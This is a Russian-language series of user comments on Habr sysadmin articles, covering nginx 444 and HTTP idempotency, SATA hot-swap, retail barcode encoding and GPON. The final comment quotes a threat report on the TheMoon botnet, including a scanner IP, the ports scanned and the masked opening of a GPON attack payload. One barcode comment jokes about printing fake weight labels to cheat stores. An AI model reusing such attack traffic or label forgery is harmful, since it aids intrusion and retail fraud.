• Основы Ansible, без которых ваши плейбуки — комок слипшихся макарон
    +1
    В статье «Основы Ansible, без которых ваши плейбуки — комок слипшихся макарон» на хабре
  • Cron в Linux: история, использование и устройство
    +3

    У logrotate'а есть параметр olddir и описание задачи выглядит так, как будто стоило использовать его для копирования, а сам logrotate запускать cron'ом

  • [Конспект админа] Как подружиться с DHCP и не бояться APIPA
    0

    Если предположить что внутри живёт Linux ядро и что dhcp сервер реализован так же как в Linux через открытие raw сокета то все становится очевидно. В Linux тоже не фильтруется трафик, который идёт через raw сокет, потому что подсистема tcp/ip в этом процессе просто не участвует

  • Что надо забыть админу при переходе на облако — и что подучить
    +1
    Последние годы перевожу компании из облаков на свои сервера. Ибо оказывается, что аренда ЦОД, свои сервера и СХД плюс самый быстрый сервис от вендора, софт виртализауии с самой быстрой поддержкой от вендора, ОС, аутсорсинг админов поддержки стоит в 3-5 раз дешевле облаков при расчете на 3/4/5 лет.

    Действую подобным образом вы имеете все шансы стать новым облачным провайдером для своих клиентов.
  • Что надо забыть админу при переходе на облако — и что подучить
    0
    Но при падении — я не знаю провайдеров облачных решений, которые готовы полностью оплачивать ущерб бизнесу из-за отсутствия сервиса. Поэтому и гарантии с облаком — в размере абонплаты.

    Так это стандартная практика во всем мире во всех отраслях. Производители серверов сломавшийся сервер вам поменяют, но оплачивать убытки из-за его простоя не будут. Автопроизводители починят сломавшийся автомобиль, но если не будут вам оплачивать упущенную прибыль сорвавшейся сделки, даже если она сорвалась из-за поломки автомобиля и так почти везде.
    Если хотите застраховаться от подобных проблем, но стоит обращаться в профильные организации, то есть в страховые компании. Причем если верить гуглу, то даже в России есть облачные провайдеры, которые сотрудничают со страховыми компаниями и вполне могут предоставить подобные услуги. Но нужно понимать что страховая сумма будет всегда ограниченна сверху и напрямую привязана к страховым взносам.
  • Что надо забыть админу при переходе на облако — и что подучить
    +1
    Решается как обычно: «консультантов облака» нужно слушать, а решения принимать самостоятельно, а не «делать все как они рассказывают». В облако есть смысл уносить службы, к которым клиенты через интернет ходят (сайт компании, сервер видеонаблюдения, на котором хранятся видео из филиалов и т.д.). Не стоит переносить в облако ресурсы, если в данный момент основная масса клиентов этого ресурса сидит рядом с сервером, особенно если есть проблема с шириной канала.
    Но при этом облако все равно можно использовать для оптимизации вышеуказанных служб.

    Например в ваших примерах: основная файлопомойка в офисе, но синхронизируется с облаком в обе стороны. Пока все хорошо, офисные работники работают через быструю локалку с офиснойной копией. Удаленные сотрудники через VPN'ы работают с облачной копией (потому что в облаке интернет шире, чем в офисе). Если в офисе с сервером вдруг что-то случится, то офисные работники перенаправляются в облако, пока все не починят. Да, на время аварии деградирует производительность(из за узкого канала), но уж лучше так, чем «ничего не работает».
    С почтой примерно так же поступаем: входящая почта валиться на сервер в облаке, там фильтруется спам, проверяется антивирусом, применяются нужные политики и т.п., а на офисный маилсервер синхронизируются только нужные письма.

    Инфраструктура конечно получается сложнее, чем простое «один сервер выполняет одну роль и по ночам бэкапится», в зависимости от конкретного стека и требований возможно что придется пойти на некоторые компромиссы, но обычно оно того стоит если сервисы действительно критичные для компании.
  • Почему (сегодня) return 444 не всегда полезен
    –4
    В моем понимании идемпотентность не связана с результатом от слова «никак».
    Проведем мысленный эксперимент: пишем генератор случайных чисел на php, выполняем 2 совершенно идентичных GET запроса и получаем разные ответы. Запросы у нас идемпотентные (потому что используют идемпотентный метод GET), а ответы сервера у нас разные.

    Второй мысленный эксперимент: отправляем методом POST на форум условный комментарий и получаем в ответ «Ваш комментарий опубликован, через 5 секунд вас автоматически переадресует на страницу обсуждения, если не переадресовало нажмите на ссылку». Потом повторяем этот запрос и получаем точно такой же ответ. В результате мы отправили 2 комментария, использовали не идемпотентный метод POST но при этом получили одинаковые ответы.

    То есть идемпотентность в терминологии HTTP это не одинаковость запросов и не одинаковость ответов, это отсутствие намерения клиента своим действием изменить что-либо на стороне сервера (Логи, аналитика и т.д. не в счет, речь о объекте, указанном в URI запроса).
    В реальном мире конечно возможно, что где-то вы найдете какую нить ссылку типа example.com/object/delete, при переходе по которой object удалиться, то есть случатся те самые «side effects», но это не сделает данный конкретный GET запрос не идемпотентным, это конкретный программист в конкретном месте нарушил стандарт и поэтому сам себе злобный буратино.
  • Почему (сегодня) return 444 не всегда полезен
    0
    Отнюдь. Запрос с отбрасыванием реферера никак нельзя считать идемпотентным.
    «идемпотентность» это не возможность сказать «точно такой же» с умным видом. В контексте нашего разговора смысл слова «идемпотентность» отличается от изначального. Идемпотентность это свойство метода, а не всего запроса. Именно это сказано в 9.1.2 все того же rfc2616 и в 4.2.2 rfc7231, а в 8.1.3 rfc7231 даже есть таблица, и в ней методы DELETE, GET, HEAD, OPTIONS, PUT и TRACE обозначены как идемпотентные, а CONNECT и POST нет.
    В вышеназванных документах пару раз встречается словосочетание «idempotent request», но в моем понимании это «запрос, использующий идемпотентный метод», а не «запрос неотличимый от другого», на это намекает хотя бы то, что речь идет о запросе в единственном числе.

    Ну и там же об автоматизации перезапросов:
    Вы трактуете «SHOULD NOT» слишком строго, как будто там написано «MUST NOT». В rfc2119 (на который есть ссылка 1.2 rfc2616 и 1.1 rfc7231) сказано:
    4. SHOULD NOT This phrase, or the phrase «NOT RECOMMENDED» mean that there may exist valid reasons in particular circumstances when the particular behavior is acceptable or even useful, but the full implications should be understood and the case carefully weighed before implementing any behavior described with this label.

    Резюмируя
    То есть в сухой выжимке — браузер (самостоятельно) может выполнить:
    — максимум два запроса;
    — эти запросы должны быть абсолютно идентичны.

    — Да, максимум 2 запроса, но если сильно хочется, то ладно уж, делайте сколько хотите, стандарт позволяет.
    — абсолютная идентичность запросов не требуется стандартом, требуется идемпотентность используемых в запросе методов.
  • Почему (сегодня) return 444 не всегда полезен
    0
    Я тут полистал rfc2616 (HTTP/1.1) и на мой скромный взгляд действие браузера выглядит вполне логично.

    Во первых в разделе 8.1.4 rfc2616 написанно:

    8.1.4 Practical Considerations

    Client software SHOULD reopen the transport connection and retransmit the aborted sequence of requests without user interaction so long as the request sequence is idempotent (see section 9.1.2).
    ...

    А во вторых в том же разделе 8.1.4:

    Servers SHOULD always respond to at least one request per connection, if at all possible.
    ...


    То есть повтор браузером идемпотентных запросов — это именно то, что рекомендует стандарт и именно это поведение для браузеров выглядит логичным. При этом использование 444 кода в nginx в некоторых случаях (конфиг из статьи, первый запрос мы делаем сразу на локейшен, прикрытый 444) может быть нарушением стандарта, поскольку в этом случае nginx закроет tcp-соединение до того, как даст первый ответ (а может и не быть нарушением стандарта, если браузер использует Keep-Alive соединение и недавно делал запрос в другим локейшенам).

    Зы честно говоря раньше я думал что nginx «забывает» соединение (примерно как DROP в iptables), но оказывается что он не «забывает» соединение, а корректно закрывает его отправляя FIN браузеру, дожидается от него FIN, и подтверждает его(если задуматься, то это тоже логично, ведь tcp управляется ядром, а не самим nginx'ом). То есть использовать код 444 для борьбы с условным DDOS'ом не так выгодно, как использовать тот же DROP в iptables (при использовании DROP в iptables мы просто выкидываем входящий пакет и ничего не отправляем в ответ, в случае же 444 мы сначала вынуждены правильно установить tcp-соединение, а потом корректно его завершить). Но при этом анализировать http-трафик «конфигом» nginx намного удобнее, чем делать тоже самое «конфигом iptables» (или любого другого фаервола), поэтому вполне логично при DDOS'ах и прочей нехорошей активности ботов собирать их адреса с помощью 444, а потом выбирать эти адреса из лога nginx и банить их в том же iptables (через ipset если их много). Дамп трафика в формате wireshark можно посмотреть тут

    Зыы все тот же rfc2616 не требует передачу реферала. Передача этого заголовка прямо запрещена при переходе с https ресурса на http, но нигде не сказано что в других случаях этот заголовок обязателен, а например в 15.1.2 написанно

    We suggest, though do not require, that a convenient toggle interface be provided for the user to enable or disable the sending of From and Referer information.
    ...
    Но видимо разработчики браузеров считают что иногда можно и «просто так» удалить этот заголовок, видимо пытаясь решить какие-то возможные зацикливания на стороне неадекватно-ведущего (с точки зрения стандарта) себя сервера. Хотя нельзя и исключать того, что это баг, а не фича браузеров.
  • Локальная авторизация без пароля в Ubuntu
    +1
    иногда «комментарий» — это не высказывание противоположной точки зрения, а просто дополнение на заданную и смежные темы.
  • Почему (сегодня) return 444 не всегда полезен
    +1
    У меня нет магического шара, который позволял бы видеть будущее, но есть куча инструментов позволяющих помнить прошлое.
    Если где-то в прошлом я нашел какую-то ссылку и запомнил ее, а сейчас перехожу по ней и там нет того документа, который я ожидал увидеть, то я предпочту получить внятную информацию о том, что именно случилось: это я ссылку неправильно запомнил и документ действительно был тут раньше но теперь удален.

    Есть стандарт, в котором про 410 код написано следующее:
    10.4.11 410 Gone
    The requested resource is no longer available at the server and no forwarding address is known. This condition is expected to be considered permanent. Clients with link editing capabilities SHOULD delete references to the Request-URI after user approval. If the server does not know, or has no facility to determine, whether or not the condition is permanent, the status code 404 (Not Found) SHOULD be used instead. This response is cacheable unless indicated otherwise.

    The 410 response is primarily intended to assist the task of web maintenance by notifying the recipient that the resource is intentionally unavailable and that the server owners desire that remote links to that resource be removed. Such an event is common for limited-time, promotional services and for resources belonging to individuals no longer working at the server's site. It is not necessary to mark all permanently unavailable resources as «gone» or to keep the mark for any length of time — that is left to the discretion of the server owner.

    Вы конечно можете брать эти же самые коды ответа, но интерпретировать их по своему, но особо надеется на то, что вас поймут когда вы отдаете 410 вместо 404 не стоит.
  • Почему (сегодня) return 444 не всегда полезен
    0
    Я требую что бы вы уважали права ботом и не фильтровали доступ к вашим сайтам из-за того, что боту удобнее посещать curl'ом!
    image
  • Почему (сегодня) return 444 не всегда полезен
    +1
    410 — раньше тут был документ, но больше его нет и никогда не будет.

    404 Not Found[19] — самая распространённая ошибка при пользовании Интернетом, основная причина — ошибка в написании адреса Web-страницы. Сервер понял запрос, но не нашёл соответствующего ресурса по указанному URL. Если серверу известно, что по этому адресу был документ, то ему желательно использовать код 410. Ответ 404 может использоваться вместо 403, если требуется тщательно скрыть от посторонних глаз определённые ресурсы. Появился в HTTP/1.0.

    410 Gone — такой ответ сервер посылает, если ресурс раньше был по указанному URL, но был удалён и теперь недоступен. Серверу в этом случае неизвестно и местоположение альтернативного документа (например копии). Если у сервера есть подозрение, что документ в ближайшее время может быть восстановлен, то лучше клиенту передать код 404. Появился в HTTP/1.1.

    wikipedia
  • Локальная авторизация без пароля в Ubuntu
    0
    Разбирал что бы посмотреть на ОЗУ, сгорел какой-то там контроллер, а диск восстановить не получилось никакой магией.

    Нее, чудеса конечно бывают, но я в них не верю. Более вероятно что ваш товарищ убил оперативку статикой (это частое явление) или повредил ее механически, а дальше ноут попал в руки не тем специалистам, которые или добили его (уронив пару раз по дороге) или поменяли планку памяти и присвоили его себе сказав вам что ничего восстановить нельзя.

    Ну или последний и наиболее вероятный вариант на мой взгляд: с того момента как история случилась, до того момента как вы ее изложили в комментарии выше из нее потерялись какие-то важные детали (или наоборот появились лишние). Вполне вероятно это могло случится еще на этапе «товарищ пересказывал вам как именно дело было».
  • Локальная авторизация без пароля в Ubuntu
    +1
    позанудствоваю немного: sata-диск действительно можно отключать\подключать на горячую, физически диск и материнки (или контроллеры) к этому готовы (во всяком случае должны быть). Готово ли к этому ПО зависит от того, в какой режим выставлен режим совместимости SATA в биосе (или UEFI). Как правило есть 2 варианта: IDE — режим совместимости, нужен только для установки старых ОС и AHCI — новый режим, именно он поддерживает горячую замену, но в могут не работать некоторые старые ОС (тут под старыми имеется ввиду что-то типа Windows до XP и прочие досы с полуосями).

    Справедливости ради стоит заметить что начиная с появления Windows Vista некоторые производители ноутбуков стали убирать из тогдашних биосов эту настройку (тогда все говорили что это MS пытается бороться с установкой WinXP на новые ноутбуки и мотивирует всех висту использовать).
    Как дела на декстопах обстоят честно говоря не скажу, на серверах обычно просто: на старых моделях по умолчанию IDE, на новых AHCI выставлено. Поэтому если арендуете какую-то железку, особенно если используете софт-рейд (mdadm) то стоит перед вводом в эксплуатацию проверить текущий режим и в случае необходимости переключить его в AHCI. В противном случае для замены диска придется согласовывать даунтайм (проверить можно в dmesg например).

    И раз зашла про это речь, то стоит упомянуть что если изменить данную настройку, то винда перестает грузиться, требуется ресетап или шаманство с драйверами установленной винды.

    Извлечение диска в линуксе в режиме AHCI:
    • Находим диск физически, что бы понимать какой именно мы будем извлекать (по серийникам, по индикации бэкплейна или еще как-то)
    • Перестаем использовать диск (отмонтируем ФС, переносим на другой PV наш LV если речь про LVM и т.д. Зависит от того, как у нас диск используется)
    • echo 1 >/sys/block/sdX/device/delete
      Вместо sdX указываем правильный диск.
    • Вытаскиваем диск физически (если нет бэкплейна, то рекомендуется сначала отключать питание, а потом дата-кабель. После отключение питания желательно подождать несколько секунд что бы головки успели запарковаться на штатное место)

    Установка нового диска:
    • Подключаем диск (если нет бэкплейна, то рекомендуется сначала подключать дата-кабель, а потом питание)
    • echo "- - -" >/sys/class/scsi_host/hostX/scan
      hostX заменяем на номер шины с диском (host0, host1 и т.д.… если не знаете можно перебрать все имеющиеся в ОС)
  • Почему (сегодня) return 444 не всегда полезен
    0
    Если бы у мобильного приложения хабры UI вменяемый был бы, то я бы еще и комментарием в правильную ветку наверное попал бы :-)

    А статья у нас не об особенностях работы 444, а о том, что для автора оказалось неожиданным поведение браузеров. Я бы переформулировал вывод в примерно такое: не используйте 444 в nginx для ответа реальным пользователям, даже если вам нечего им ответить. Пользователю лучше отдать 403, 404 или другой подходящий по смыслу код. 444 придумали для борьбы с «плохими» ботами и применять его нужно только после взвешивания всех «за» и «против», и желательно как временную меру (то есть например собирать 444 из лога и банить этих ботов в фаерволе или что-то типа того).
  • Почему (сегодня) return 444 не всегда полезен
    0

    418 "лучше" чем 444. 418 дойдет до браузера, отличить же 444 от "ошибки сети" (с точки зрения браузера) невозможно

  • Как мы пытались разобраться в штрихкодировании и ничего не поняли
    –1
    От ПО и его настроек зависит. В том же фронтоле (на него шикарная документация лежит прям на офф. сайте, в отличии от конкурентов, что позволяет освежить такие моменты в памяти) это реализуется через «разрезы», как это называлось в 1с я сходу не вспомню, да и честно говоря даже не уверен что это был базовый функционал, а не доработка нашего программиста.
  • Как мы пытались разобраться в штрихкодировании и ничего не поняли
    0
    Вот интересный момент со сканерами в телефонах. Откуда они берут информацию? Значит есть общая база? Или с какого-то одного регистратора? Ведь внутри организации можно хоть как нумеровать, как ниже писали

    Есть ресурсы (например barcode-list.ru, goodsmatrix.ru, ean13.info) которые по сути парсят прайслисты и показывают какие нашли названия рядом с этим ШК. Так же можно попытаться собрать свою базу, но не более того. Никакой общей и глобальной базы нет, а если она и есть, то ее существование очень сильно скрывается (хотя непонятно зачем).

    Но собирать базу по ШК начинающимся с двойки совершенно бесполезно(та часть диапазона, которая обычно используется внутри предприятий), если делать это не в разрезе предприятий, использующих эти ШК.
    А собирать все внутренние ШК всех предприятий в мире на мой взгляд пустая трата времени, все равно по его виду нельзя точно установить кому этот ШК принадлежит.
  • Как мы пытались разобраться в штрихкодировании и ничего не поняли
    +6
    Да, в случае нескольких разных товаров под одним кодом у кассира выскакивает окно для ручного выбора, так что волноваться не стоит (в большинстве торговых сетей так).


    Личная практика примерно пятилетней давности в основном по продовольственным магазинам в московской области, отсюда некоторая специфика, но мне кажется что научить кассиров выбирать правильный товар по ШК конечно реально, но первое время нужно контролировать его действия (для исключения ошибок), а потом тоже желательно контролировать его действия (для исключения злонамеренного использования данной функции).

    Кстати, так же хотел бы упомянуть, что если первой цифрой стоит «2», то по «идее» этот ШК используется только внутри предприятия.

    Да, это аналог «серых ip-адресов» который каждое предприятие может использовать по своему усмотрению. Условно эти ШК можно разделить на «простые» и «составные».

    Простые печатаются как правило на принтере этикеток и клеятся на коробку с товаром (или на сам товар), если заводского ШК у них нет (или есть, но использовать его по какой-то причине не хочется). Как правило кодируются они так: «цифра 2 + код товара + контрольное число». Код товара добивается нулями до нужной длины. Иногда сюда может быть добавлена информация о коде секции, группе товаров или еще что-то, но на практике подавляющее большинство ограничивается только кодом товара и обязательными атрибутами (цифра 2 в начале и контрольное число в конце).

    Составные ШК как правило используются для «весовых» товаров и печатаются соответственно весами в торговом зале. Как правило в них информация кодируется примерно так: «цифра 2 + код товара + вес товара + контрольная цифра». Код товара обычно продублирован на ценнике и является строго уникальным в пределах предприятия, вес товара указан так же на этикетке, так что если вдруг вам хочется обмануть магазин, то вы знаете как печатать свои ШК :)

    Стоит добавить что есть другие схемы кодирования информации в «составных» ШК, например «2 + вес + цена + контрольное число» или «2 + код товара + сумма + контрольное число» и другие(тут можно придумать много вариантов, большинство ПО позволяют самостоятельно настроить схему, по которой интерпретируется ШК), но как правило они не используются, ибо в первом случае теряем информацию о том, что именно мы продали, а во втором случае изменения цены ведут либо к перемаркировке всего товара, либо неправильному отпуску товара (неправильная цена на кассе и неправильное кол-во в отчетах о продаже и в остатках по складу). В общем понятно что теоретически вариантов масса, а на практике как правило это «код товара + вес».

    Про простые ШК еще добавлю: их можно и нужно переклеивать только там, где товар «не очень ходовой» или где «процесс продажи товара это долгий процесс, в котором время регистрации товара на кассе — меньшая по времени часть, чем весь остальной процесс». Если же начать переклеивать ШК на достаточно-ходовой товар (условно говоря на том же хлебе, который каждый день привозят новый, потому что он весь продается), то окажется что это очень дорого (не столько по деньгам, сколько по времени на это). Так что правильный вариант в данном случае поступать так же, как и все остальные — держать ШК в тетрадке на кассе (или приклеить его где-то на кассе со стороны продавца, если таких товаров не очень много).

    Можно было бы расширить статью про коды для упаковки из нескольких товаров и т.д.

    Тут никакой магии со стороны ШК нет, возьмем условный блок сигарет, который состоит из 10 пачек. На блоке свой ШК, на пачке свой. Причем нет никакой «системы», то есть можно на пачку печатать ШК «N», а на блок «N+1», а можно наоборот на блок печатать «N», а на пачку «N+1» или «N+500» (с поправкой на контрольное число конечно же). То есть просто два разных ШК и никакой магии. Вся магия находится внутри используемого ПО, именно оно «помнит» что в блоке 10 пачек сигарет, в условной упаковке йогуртов только 4 маленьких бутылочки, именно ПО пересчитывает проданные блоки (или упаковки) в штуки (ведь как правило учет идет в пачках сигарет или бутылках йогурта, а не в блоках и упаковках). Так же нормальное ПО (при правильной настройки со стороны IT и правильной эксплуатации со стороны ритейла) может автоматически «собирать наборы» (условно говоря: регистрировать несколько товаров по одному ШК, например при акции «купи кастрюлю и получи половник в подарок» автоматически списывать с остатков два эти разные товара, а в чеке писать «кастрюля 100р, половник — бесплатно» или «набор кастрюля и половник — 100р», может автоматически показывать остатки товаров в разных местах(например при продаже каких-нить болтов в автомагазине продавцу может высветиться: «таких болтов числиться на остатке 1005 штук, нужно 7 штук, 5 штук возьми на витрине на месте с5, а еще 1000 болтов лежит на складе в 2х коробках на стеллаже №4, на месте e7», после чего автоматически переместит одну коробку (500штук) со склада на витрину на то самое место c5 и в следующий раз уже не будет писать про оставшуюся на складе коробку (пока она не потребуется). Обычно актуально для автомагазинов, метизов и прочих продавцов у которых много мелких позиций)).

    Но то, что я видел в реальной жизни (продуктовые магазины и небольшие сети, иногда непродуктовые магазины) — это «не заводим ШК блока, потому что мы не продаем сигареты блоками», условные йогурты, на которых производитель проставил разные ШК живут в одной карточке «йогурт в ассортименте» (в карточку добавлены все варианты ШК), и объяснить создающим такое в БД почему оно плохо может только аналитик через руководство, мнение простого айтишника по этому вопросу не находит никакого понимания (не мешай людям работать, это никому не нужно), при этом должность аналитика есть далеко не везде и некоторые руководители искренне не понимают «в чем проблема то».

    Вместо создания связанных «бутылка йогурта» и «упаковка из 6 бутылок» делаются просто 2 никак не связанные карточки товара и никто тоже не видит в этом ничего плохого. Итоговые продажи не суммируются, а идут двумя разными строчками, цены не привязаны друг к другу, перемещение из «упаковок» в «бутылки» выполняется актом инвентаризации\пересорта, а не правильным «разукомплектовыванием», и обычно после того, как этот товар пошел в минус.

    В свое время, когда только появился закон о фиксированной цене на сигареты я видел что некоторые сигареты шли «с разной ценой на пачке, но одинаковым ШК». На моих глазах видел как проблему решали постоянной инвинтаризацией сигарет (не только по маркам, но и по цене), не выпускали новую партию в зал, пока полностью не продавали старую (на одной кассе осталась последняя пачка за X рублей, новая партия на складе лежит с ценой Y рублей, пока последняя пачка не продастся новую держат на складе, кассиры, особенно в час-пик отвечают «таких нет, закончились, возьмите что-нить другое» если эта несчасная пачка оказалась не на их кассе, что бы не искать ее по всем кассам (тем более что некоторые кассы могут быть заперты на ключ)). Другой вариант — когда с новой ценой менялся и ШК. Некоторые заводили новую позицию вида «Название, цена X», «Название, цена Y» и т.п. и на первый взгляд все было более-менее нормально, а потом аналитик крутил отчет по сигаретам за 3 месяца-полгода-год и сначала не понимал что это за цифры ему показываются и почему они такие странные относительно прошлых периодов, а потом присмотревшись понимал что вместо одной строки на позицию каждая позиция представленна несколькими строками и отчет приходится доводить руками к экселе. И все это ради того, что не ломать кассирам привычный порядок действий. В итоге почти все со временем пришли к варианту что в карточку заносится две разные цены, кассир при регистрации выбирает нужную(если одинаковый ШК), а со временем (после инвентаризации) старая цена из карточки удаляется.

    Так же несколько раз видел заводской ШК начинающийся двойку. Но это был китайский ширпотреб(в самом плохом смысле этого понятия, повторно его не заказывали, но совершенно точно не из-за плохих ШК).

    Резюмирую: если на упаковке из нескольких товаров ШК отличается от ШК на упаковке одной единицы товара, то уже хорошо. Если же ШК с одной единицы товара нельзя прочитать пока товар находиться в групповой упаковке, то вообще замечательно (наблюдал как СБ ловили кассира продававшего своим знакомым тот же йогурт в упаковке по несколько штук пробивая по кассе одну бутылочку, а не всю упаковку). Больше от этих ШК ничего не требуется, все остальная магия должна быть в вашем ПО.

    Зы: Так же теории бывают «составные» ШК от производителей, то есть те, которые начинаются не с двойки, а по стандарту содержат код страны и код предприятия и код товара (конечно с точки зрения изготовителя, а не продавца), но при этом так же содержат информацию о количестве товара в упаковке. Это могло бы быть актуальным для случаев, когда условная рыба (или любой другой штучный, но не идентичный друг другу) на заводе после приготовления пакуется в вакуумную упаковку поштучно и отправляется в магазин. Как правило в таких случаях на этикетке указан вес товара нетто, при этом в каждом случае он отличается от «такой же соседней упаковки», но в реальности я ни разу в жизни такого не видел, на всех подобных этикетках что мне попадались стоял одинаковый ШК (или вообще никакого), и в магазинах при их продаже их перевешивают и клеят этикетки с внутренним ШК по вышеописанной схеме для весового товара, хотя о том, как настроить ПО для работы с такими ШК читал в документации.
  • Сам себе VDS-провайдер
    +1
    Мониторинг smart сообщит о необходимости замены диска ещё до того, как он станет неработоспособен.

    Далеко не факт. Бывает что диск в смарте пишет о проблеме, но при этом нормально работает годами (приличный хостер вам его конечно сразу поменяет), а бывает что диск умирает «без объявления войны»
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    0
    Скорей всего достать прошивку можно, но дальше:
    Модифицировать прошивку так, что бы клиент мог ей управлять как он хочешь, а провайдер этого не замечал. Причем это все имею полузакрытые (или закрытые) протоколы, только бинарник прошивки и кучу других неизвестных. То есть с одной стороны я понимаю что в теории это скорей всего возможно(а если модифицировать hardware ONU, то возможно все), а с другой я почти уверен что ни у меня, ни у моего друга знакомого, ни кого другого, к кому я бы мог обратиться за помощью чисто по дружбе не хватит знаний для выполнения подобной операции и за конечный и небольшой промежуток времени, профессионалы за такое заломят достаточно большую цену (и будут совершенно правы, как минимум нужно закупить такое же как у провайдера оборудование). Единственный, кто может успешно пройти этим путем — это хакеры (в старом значении этого слова) в области разработки устройств\прошивок, знакомые с темой GPON и готовые убить кучу времени на единичное, немаштабируемое решении ради just for fun. (всем остальным это или не нужно (потому что не интересно), или нужно, но сами они такое сделать не смогут, а оплатить сторонние услуги будет очень дорого и без каких либо гарантий).

    Ps почему нельзя пойти по пути «расковырять прошивку, найти стандартный пароль, зайти в ONT и выставить на ней режим моста» я упоминал выше, это то, что многие настройки хранятся на OLT, а не на ONU. Процитирую пожалуй одного из людей, который непосредственно админил такие вещи со стороны провайдера и отвечает на вопрос «можно ли заменить ONU на вот это с алиэкспресса?»(извините, что без ссылки, это обсуждение было не в паблике):
    цитата
    не получится у тебя поставить другой пон, он не будет работать.

    Поясню. Конфиг конечных понов (ONT) хранится на плате у провайдера (OLT), то есть настраивается не оконечка, а именно место на плате (ONU). Если на одно и тоже волокно воткнуть другую железку такой же модели, её не надо настраивать заново, конфижка зальётся с платы сразу же. Но если на эту онушку воткунуть железку хотя бы другой модели, например, вместо пона 2520 поставить 2424, то конфиг уже не всосётся, а значит и работать не будет.
    А ты хочешь пон не просто другой модели, а даже другой фирмы воткнуть на это волокно — не выйдет.
    Пример, как это выглядит у провайдера. У рт немного иначе, но суть та же.
    image

  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    0
    Рад что мои сообщения помогают людям тратить деньги и время более рационально.
  • Business Insider: Microsoft ведет переговоры о покупке GitHub
    0
    С первого раза конечно может не получится, поэтому в случае неудачи повторяйте процесс до получения нужного результата.
  • Business Insider: Microsoft ведет переговоры о покупке GitHub
    0

    Сделать хорошую ОС (для любого типа устройств) просто: наймите хороших архитекторов, хороших программистов, хороших тестировщиков, хороших менеджеров и хороших профессионалов во всех остальных связанных областях. С первого раза конечно может не получится, поэтому в случае неудачи повторяйте процесс до получения нужного результата.

  • Небольшая заметка про wildcard сертификаты Let’s Encrypt
    0
    Выпуск сертификата должен осилить acme.sh в режиме webroot. В крайнем случае можно и без рутовых прав поставить себе certbot в ~username/bin (возможно потребуется добавить библиотек по вкусу) и использовать его (конечно только в режиме webroot или dns), но убедить веб-сервер, настроенный через панель, забирать сертификат из вашего домашнего каталога скорей всего не получится.

    В случае «используем виртуальный хостинг не поддерживающий LE и сертификат от LE» основная проблема на мой взгляд — не выпуск сертификата, а его автоматическая «заливка» в панель. Придется либо с API разбираться (при условии что добрые администраторы хостинга не закрыли его «на всякий случай»), либо «изображать браузер скриптами» (curl и парсить html-ответы, либо автоматизация действий в настоящем браузере), либо ручками постоянно его обновлять(каждые 90 дней). Это конечно технически решаемо, но боюсь не для среднестатистического покупателя услуги «виртуальный хостинг». Так что лучше спросить у саппорта «есть ли поддержка LE в панели хостинга», и если нету, то уходить к конкурентам или купить классический сертификат на год (раз в год можно и руками его залить).

  • Небольшая заметка про wildcard сертификаты Let’s Encrypt
    0
    www.reg.ru/support/ssl-sertifikaty/ustanovka-ssl-sertifikata
    Ссылки «Установка SSL-сертификата в ISPmanager», «Установка SSL-сертификата в Parallels Plesk» и «Установка SSL-сертификата в cPanel» в зависимости от вашей панели (ага, регру при заказе дает выбрать наиболее удобную вам панель) если ваш вопрос про «обычный виртуальный хостинг».

    Но при этом сертификат уже должен быть у вас на руках (сам файл сертификата и приватный ключ к нему).

    Если вы под «подключить» имеете введу «выпускать сертификат на сервере регру и сразу же там его использовать, по аналогии с тем, как работает certbot», то я сходу затрудняюсь ответить можно ли это делать на серверах вирт. хостинга в регру или нике. С одной стороны я точно знаю что под isp manager и cpanel (про plesk не знаю, не работал с ним никогда, но почти уверен что и под него тоже) есть модули\плагины, которые позволяют клиентам «автоматически выпускать и продлевать сертификаты прям на сервере», то есть тыкнуть пару кнопок и забыть про этот, с другой стороны я совершенно не уверен что эти плагины установлены.
    Так что если хостинга у вас еще нет и вы только собираетесь его покупать, то лучше всего задать этот вопрос саппорту компании, если же хостинг уже куплен, то смотрим в панель управления и опять задаем вопрос саппорту если самому разобраться не получается.

    Зы если под «хостингом» имеется ввиду VPS, то тут точно проблем не будет, если покупаете VPS с панелью, то просто ставите плагин и настраиваете из панели. Если VPS без панели, то ставите любой клиент (certbot или acme.sh). Причем так у всех хостеров.
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    0
    Все просто 1 гигабит на дом, а то и несколько а то и на ветку из нескольких.

    Сети можно строить с избыточностью и подключать один access-свич к нескольким distribution-свичам. При этом не обязательно через STP блокировать «избыточные линки». Как минимум можно начать с PVST и разные вланы пускать по разным физическим каналам. К тому же можно даже между одним access-свичем и одним distribution-свичем кинуть несколько каналов и собрать их в Po.

    Причем классическому провайдеру легче модернизировать свою сет, начиная с того что аплинки можно добавлять-удалять в Po без даунтаймов и заканчивая тем, что можно в ящик поставить новую модель свича с бОльшим аплинком, рядом со старым и переткнуть в него всех пользователей за 2 минуты (при том для каждого даунтайм будет в несколько секунд).
    В случае же GPON на сколько я понимаю вариантов будет 2: либо замена оборудования в квартирах всех пользовалей данного сегмента разом (когда выйдут более скоростные варианты), либо притащить новый сегмент от OLT и отселить часть пользователей на него

    Плюс абоненту не надо покупать никакого оборудования или платить за него аренду, а из одного устройства у него есть и телефон и интернет и нормальный Wi-Fi в двух диапазонах.
    Особенно радует что пенсионерам, которым «не нужен нам ваш интернет» ставят такие же устройства ради телефона от МГТС, wifi при этом никто естественно не отключает. Эфир от этого свободней не становится к сожалению.

    З.Ы.: Я не хочу сказать, что GPON прям лучшая технология на свете, но и говорить, что это зло для абонентов и только в плюс оператору — не надо.

    Да вроде никто и не говорит что технология плохая, говорят о том, что маркетологи продают GPON обещая совершенно не то, что есть на самом деле, и смысла брать GPON при наличии сопоставимых альтернатив ровно ноль.
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    +1
    а ни разу не ограничением технологии

    Да, конечно. Проблема в операторе, а не технологии. Если я ничего не путаю, то изначально и был только бридж, а потом уже начали в одну железку пихать нат, wifi и прочие, не всегда заботясь о том, что бы все вместе это работало.
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    +1
    Промахнулся немного.
    Мое скромное мнение.
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    +1
    В оригинальном посту сказано

    The features about this round of TheMoon:
    The features about this round of TheMoon:
    Scanner IP: 177.141.64.108 Brazil/BR São Paulo «AS28573 CLARO S.A.»
    Scanning Port:80 ,8080,81,82,8888, with the GPON scan only on port 80

    Attacking Payload (masked):
    POST /--------/--------?---------/ HTTP/1.1  
    Accept: */*  
